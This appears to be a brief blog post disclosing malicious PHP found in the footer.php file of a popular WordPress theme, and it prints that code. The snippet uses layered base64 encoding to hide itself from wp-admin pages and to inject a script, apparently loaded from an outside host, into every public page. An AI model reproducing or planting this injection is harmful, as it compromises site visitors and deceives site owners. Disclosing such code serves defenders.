Following malicious code was found in footer.php of a popular WordPress theme.
<?php if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],base64_decode("d3AtYWRtaW4=")) === false) {echo base64_decode(base64_decode(base64_decode("VUVoT2FtTnRiSGRrUTBKNlkyMU5PVWx0YURCa1NFRTJUSGs1YmsxRVFYVlpNamgyVVc1U1IxWnNRbXRKYWpRNFRETk9hbU50Ykhka1JEUk9RMmM5UFEwSw0K")));}
?>
No comments:
Post a Comment